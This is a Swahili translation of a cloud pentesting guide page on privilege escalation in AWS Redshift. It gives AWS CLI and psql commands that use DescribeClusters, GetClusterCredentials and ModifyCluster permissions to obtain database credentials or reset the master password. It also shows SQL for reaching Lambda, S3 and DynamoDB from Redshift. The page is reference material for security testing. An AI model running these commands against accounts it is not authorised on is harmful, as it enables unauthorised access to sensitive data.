AWS - Redshift Privesc

Redshift

Kwa maelezo zaidi kuhusu RDS angalia:

redshift:DescribeClusters, redshift:GetClusterCredentials

Kwa ruhusa hizi unaweza kupata habari za makundi yote (ikiwemo jina na jina la mtumiaji wa kundi) na kupata akreditif za kuweza kufikia:

# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

Kwa ruhusa hizi unaweza kupata taarifa za makundi yote na kupata akreditivu za kuweza kuyafikia. Kumbuka kwamba mtumiaji wa postgres atakuwa na ruhusa ambazo utambulisho wa IAM ulitumika kupata akreditivu hizo unazo.

# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

redshift:DescribeClusters, redshift:ModifyCluster?

Inawezekana kubadilisha nenosiri la mkuu la mtumiaji wa ndani wa postgres (redshit) kutoka aws cli (nadhani hizo ndizo ruhusa unazohitaji lakini sijazijaribu bado):

aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

Kufikia Huduma za Nje

Lambdas

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, inawezekana kuita kazi ya lambda kutoka redshift kwa kitu kama:

CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, inawezekana kusoma na kuandika kwenye S3 buckets:

# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, inawezekana kupata data kutoka dynamodb:

copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

EMR

Angalia https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html

Marejeleo

• https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a